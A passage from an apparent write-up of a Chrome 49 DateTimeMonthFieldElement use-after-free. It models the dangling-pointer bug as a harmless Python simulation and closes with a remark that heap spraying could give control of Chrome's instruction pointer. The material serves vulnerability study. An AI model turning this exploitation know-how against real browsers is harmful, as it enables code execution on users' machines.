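    reload does. Returns the state dict, or the error message for a dangling entry."""
    doc = Document()
    month = doc.append(FieldElement("month", 4))
    year = doc.append(FieldElement("year", 2016))
    editor = editor_cls([month, year])
    del month, year                 # doc.nodes now holds the only owning references
    doc.delete_from_document()
    try:
        return editor.value_as_state()
    except RuntimeError as err:
        return str(err)


if __name__ == "__main__":
    print("raw-pointer editor:", scenario(RawPointerEditElement))
    print("traced editor:     ", scenario(TracedEditElement))
```

The model relies on CPython freeing an object the moment its last reference goes, which is the same immediacy RefPtr had; that is what makes the raw-pointer list stale before the state is saved.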

Using a heap spray or some other method, we could control the EIP of Chrome.

Chrome 49 stable DateTimeMonthFieldElement UAF & POC